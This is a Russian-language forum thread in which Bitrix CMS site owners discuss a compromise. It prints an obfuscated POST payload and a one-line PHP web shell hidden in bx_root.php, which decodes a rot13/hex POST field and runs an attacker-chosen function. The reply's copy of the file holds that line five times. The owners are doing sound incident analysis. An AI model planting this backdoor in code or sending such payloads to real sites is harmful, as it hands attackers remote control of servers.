[QUOTE] написал:
Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают: [CODE] array (
'BX_STAT' => '303q66696p655s7075745s636s6r74656r747326313q6269747269782s61646q696r2s6561323033363065653039302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297o6563686s226s6o223o6576616p286261736536345s6465636s646528245s524551554553545o69645q29293o696628245s504s53545o227570225q3q3q22757022297o40636s707928245s46494p45535o2266696p65225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225q5o226r616q65225q293o7q7q3s3r' ,
) [/CODE] обнаружил код в файле \bitrix\modules\main\bx_root.php [CODE] <?
if ( isset ( $_POST [ "BX_STAT" ]) && $_POST [ "BX_STAT" ] <> "" ) parse_str(hex2bin(str_rot13( $_POST [ "BX_STAT" ])), $bx_stat ) or die (str_rot13(bin2hex( $bx_stat [ 0 ]( $bx_stat [ 1 ], $bx_stat [ 2 ]))));
?> [/CODE] Что интересно дата bx_root.php такая же как у всех файлов ядра. В других дистрибутивах этого кода не обнаружил и поэтому удалил его. Наблюдаю дальше.
P.S Битрикс 18.5.180. [/QUOTE]
у меня в этом файле вот что
[CODE]<?
/*
$fname1 = __FILE__;
$fname2 = $_SERVER["DOCUMENT_ROOT"];
if(strpos($fname1, $fname2)!==0)
{
$fname1 = realpath(__FILE__);
$fname2 = realpath($_SERVER["DOCUMENT_ROOT"]);
}
if(strpos($fname1, $fname2)===0)
{
$fname3 = RTrim($_SERVER["DOCUMENT_ROOT"], " /\\");
$bx_root = substr($fname1, strlen($fname3));
$bx_root = substr($bx_root, 0, strlen($bx_root) - strlen("/modules/main/include.php"));
}
else
$bx_root = "/bitrix";
$bx_root = str_replace("\\", "/", $bx_root);
*/
$bx_root = "/bitrix";
define("BX_ROOT", $bx_root);
if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "")
define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);
else
define("BX_PERSONAL_ROOT", BX_ROOT);
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?>
[/CODE]